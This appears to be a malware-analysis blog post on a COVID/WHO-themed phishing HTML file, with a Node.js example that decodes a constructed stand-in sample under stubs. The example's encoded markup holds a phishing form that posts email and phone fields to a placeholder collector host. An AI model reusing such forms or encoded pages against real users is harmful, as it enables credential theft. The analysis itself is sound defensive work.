The sample being analysed is a Microsoft Doc phishing HTML file that uses the Coronavirus and WHO names. The file tries to steal the user's email credentials, backup account and phone number by luring them into entering their details in a crafted fake HTML site.
Please be careful when dealing with these kinds of phishing webpages (e.g. DHL, Dropbox, PayPal, Microsoft etc.) from unknown sources.
Install nodejs & npm
Looking at the beautified code, there is one function that is called repeatedly. The function looks like a decrypter, and the decrypted strings/code replace the specific CSS tag that has been declared in the HTML file.
It's time to run the node command, but first comment out the lines that contain HTML document related functions (e.g. document.write(), ActiveXObject), as they will cause errors at runtime.
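As an added example (not code from the sample or from the original post), the same step can be done without commenting lines out by giving Node recording stubs for `document` and `ActiveXObject`. The encoded script, the `dec` function and the `collector.example` URL are constructed stand-ins for the real sample.

```javascript
const vm = require('vm');

// Constructed stand-in for the sample: a decoder called repeatedly, with the
// output handed to document.write(). The encoder exists only to build it.
const enc = (s, k) =>
  [...s].map(c => (c.charCodeAt(0) ^ k).toString(16).padStart(2, '0')).join('');
const CONSTRUCTED_SAMPLE = `
function dec(s, k) {
  var out = '';
  for (var i = 0; i < s.length; i += 2)
    out += String.fromCharCode(parseInt(s.substr(i, 2), 16) ^ k);
  return out;
}
document.write(dec('${enc('<form action="https://collector.example/post.php" method="post">', 7)}', 7));
document.write(dec('${enc('<input name="email"><input name="phone">', 7)}', 7));
new ActiveXObject('Scripting.FileSystemObject');
`;

// Run the script with recording stubs for the browser-only objects, so no
// line has to be commented out. Node's vm module is not a security boundary:
// do this inside a disposable, offline analysis VM.
function runWithStubs(source) {
  const writes = [];
  const activeX = [];
  const sandbox = {
    document: {
      write: (...parts) => writes.push(parts.join('')),
      writeln: (...parts) => writes.push(parts.join('') + '\n'),
    },
    ActiveXObject: function (progId) { activeX.push(String(progId)); },
  };
  vm.runInNewContext(source, sandbox, { timeout: 2000 });
  return { writes, activeX };
}

// Pull the URLs the decoded markup refers to (for blocking or reporting).
function extractUrls(text) {
  return [...new Set(text.match(/https?:\/\/[^\s"'<>)]+/g) || [])];
}

const result = runWithStubs(CONSTRUCTED_SAMPLE);
console.log(result.writes.join('\n'));
console.log('URLs:', extractUrls(result.writes.join('')));
console.log('ActiveX requested:', result.activeX);
```

The recorded `writes` are the decoded markup that would have been injected into the page, and the extracted URL is where the form posts the entered details.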
Here is the screenshot of decrypted strings in
After glancing through the code, it seems the page is interacting with an unknown URL, shown in the screenshot below.
Any data entered by the user is sent to the unknown URL (most likely the attacker), and your credentials are then exposed to them. :’(
The attacker can gain access to your account and take it over.
However, the attacker will have restricted access to MFA-enabled accounts.
Coronavirus World Health Organization (WHO).html
How To Install Node.js on Ubuntu 18.04 | DigitalOcean